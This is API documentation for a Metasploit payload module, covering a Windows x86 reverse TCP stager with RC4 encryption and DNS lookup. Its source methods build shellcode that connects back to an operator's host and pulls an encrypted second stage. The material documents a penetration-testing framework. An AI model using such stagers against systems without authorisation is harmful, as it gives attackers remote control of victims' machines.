Module: Msf::Payload::Windows::ReverseTcpRc4Dns

Includes:

TransportConfig, ReverseTcpDns, ReverseTcpRc4

Defined in:

lib/msf/core/payload/windows/reverse_tcp_rc4_dns.rb

Overview

Complex reverse_tcp_rc4 payload generation for Windows ARCH_X86

Constant Summary

Constants included from Rex::Payloads::Meterpreter::UriChecksum

Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_CONN, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_CONN_MAX_LEN, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITJ, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITN, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITP, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITW, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INIT_CONN, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_MIN_LEN, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_MODES, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_UUID_MIN_LEN

Instance Method Summary

• #generate(_opts = {}) ⇒ Object

  Generate the first stage.

• #generate_reverse_tcp_rc4_dns(opts = {}) ⇒ Object

  Generate and compile the stager.

Methods included from ReverseTcpDns

#asm_reverse_tcp_dns, #generate_reverse_tcp_dns, #initialize

Methods included from ReverseTcp

#asm_block_recv, #asm_reverse_tcp, #generate_reverse_tcp, #include_send_uuid, #initialize, #required_space, #transport_config

Methods included from Exitfunk

#asm_exitfunk

Methods included from BlockApi

#asm_block_api

Methods included from SendUUID

#asm_send_uuid, #uuid_required_size

Methods included from Msf::Payload::Windows

#apply_prepends, exit_types, #handle_intermediate_stage, #include_send_uuid, #initialize, #replace_var

Methods included from PrependMigrate

#apply_prepend_migrate, #initialize, #prepend_migrate, #prepend_migrate?, #prepend_migrate_64

Methods included from TransportConfig

#transport_config_bind_named_pipe, #transport_config_bind_tcp, #transport_config_reverse_http, #transport_config_reverse_https, #transport_config_reverse_ipv6_tcp, #transport_config_reverse_named_pipe, #transport_config_reverse_tcp, #transport_config_reverse_udp, #transport_uri_components

Methods included from UUID::Options

#generate_payload_uuid, #generate_uri_uuid_mode, #initialize, #record_payload_uuid, #record_payload_uuid_url

Methods included from Rex::Payloads::Meterpreter::UriChecksum

#generate_uri_checksum, #generate_uri_uuid, #process_uri_resource, #uri_checksum_lookup

Methods included from Pingback::Options

#initialize

Methods included from ReverseTcpRc4

#asm_block_recv_rc4, #generate_reverse_tcp_rc4

Methods included from Rc4

#asm_decrypt_rc4, #generate_stage, #handle_intermediate_stage, #initialize

Instance Method Details

#generate(_opts = {}) ⇒ Object

Generate the first stage

# File 'lib/msf/core/payload/windows/reverse_tcp_rc4_dns.rb', line 20

def generate(_opts = {})
  xorkey, rc4key = rc4_keys(datastore['RC4PASSWORD'])
  conf = {
    port:        datastore['LPORT'],
    host:        datastore['LHOST'],
    retry_count: datastore['ReverseConnectRetries'],
    xorkey:      xorkey,
    rc4key:      rc4key,
    reliable:    false
  }

  # Generate the advanced stager if we have space
  if self.available_space && cached_size && required_space <= self.available_space
    conf[:exitfunk] = datastore['EXITFUNC']
    conf[:reliable] = true
  end

  generate_reverse_tcp_rc4_dns(conf)
end

#generate_reverse_tcp_rc4_dns(opts = {}) ⇒ Object

Generate and compile the stager

# File 'lib/msf/core/payload/windows/reverse_tcp_rc4_dns.rb', line 43

def generate_reverse_tcp_rc4_dns(opts={})
  combined_asm = %Q^
    cld                    ; Clear the direction flag.
    call start             ; Call start, this pushes the address of 'api_call' onto the stack.
    #{asm_block_api}
    start:
      pop ebp
    #{asm_reverse_tcp_dns(opts)}
    #{asm_block_recv_rc4(opts)}
  ^
  Metasm::Shellcode.assemble(Metasm::X86.new, combined_asm).encode_string
end